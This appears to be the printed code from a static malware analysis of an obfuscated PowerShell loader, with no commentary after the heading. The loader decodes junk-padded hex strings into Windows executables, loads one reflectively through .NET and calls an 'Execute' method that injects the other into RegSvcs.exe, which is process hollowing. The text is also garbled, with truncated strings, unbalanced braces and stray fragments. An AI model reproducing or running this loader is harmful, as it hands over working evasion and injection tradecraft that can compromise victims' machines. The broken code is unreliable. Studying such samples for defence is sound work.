Static Analysis

function rasm {

param($nilk)$nilk = $nilk -split '(..)' | ? { $_ }

ForEach ($wjok in $nilk)

[Convert]::ToInt32($wjok,16)

$njyk = '4D5A9u4.eu4.eu4.eu4.e3u4.eu4.eu4.eu4.eu4.eu4.eu4.e4u4.eu4.eu4.eu4.eu4.eu4.eFFFFu4.eu4.eu4.eu4.eB8u4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.e4u4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.e8u4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eE1FBAu4.eEu4.eu4.eB4u4.e9CD21B8u4.e14CCD21546869732u4.e7u4.e726F6772616D2u4.e63616E6E6F742u4.e62652u4.e72756E2u4.e696E2u4.e444F532u4.e6D6F64652Eu4.eDu4.eDu4.eA24u4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.e5u4.e45u4.eu4.eu4.eu4.e4Cu4.e1u4.e3u4.eu4.e239u4.eB75Eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eEu4.eu4.eu4.eu4.e2u4.e1u4.eBu4.e1u4.e8u4.eu4.eu4.eu4.eB2u4.eu4.eu4.eu4.eu4.eu4.eu4.eAu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.eu4.e7EDu4.eu4.eu4.eu4.eu4.eu4.eu4.e2u4.eu4.eu4.eu4.eu4.eu4.eu4.eEu4.eu4.eu4.eu4.

$likw = '4D5A9oCRoCRoCRoCR3oCRoCRoCRoCRoCRoCRoCR4oCRoCRoCRoCRoCRoCRFFFFoCRoCRoCRoCRB8oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR4oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR8oCRoCRoCRoCRoCRoCRoCRoCRE1FBAoCREoCRoCRB4oCR9CD21B8oCR14CCD21546869732oCR7oCR726F6772616D2oCR63616E6E6F742oCR62652oCR72756E2oCR696E2oCR444F532oCR6D6F64652EoCRDoCRDoCRA24oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR5oCR45oCRoCRoCRoCR4CoCR1oCR3oCRoCR985B9FE9oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCREoCRoCRoCR222oCRoCRBoCR13oCRoCRoCRoCRoCR24oCRoCRoCRoCRoCRoCRoCR6oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR3E43oCRoCRoCRoCRoCRoCR2oCRoCRoCRoCRoCRoCRoCR6oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR1oCRoCRoCR2oCRoCRoCRoCRoCRoCRoCRoCR2oCRoCRoCRoCRoCR4oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCR6oCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRoCRAoCRoCRoCRoCRoCRoCRoCRoCR2oCRoCRoCRoCRoCRoCRoCRoCRoCRoCR

}catch{}

}catch{}

[Byte[]] $rasm = rasm $wjok

[Byte[]] $wnbs = rasm $likw

[Byte[]] $iyqz = rasm $njyk

$eoim = [Ref].Assembly

$fvda = $eoim::'Load'(($wnbs))

}catch{}

$tdgx = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcnjbiwjqkgus.exe'

$fvda.'GetType'('NewnjbiwjqkguPE.PE'.replace('njbiwjqkgu','')).GetMethod('Exnjbiwjqkguecunjbiwjqkgute'.replace('njbiwjqkgu','')).'Invoke'($null,($tdgx.replace('njbiwjqkgu',''),$iyqz))

$null,[object[]] ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null, $tdgx

}catch{}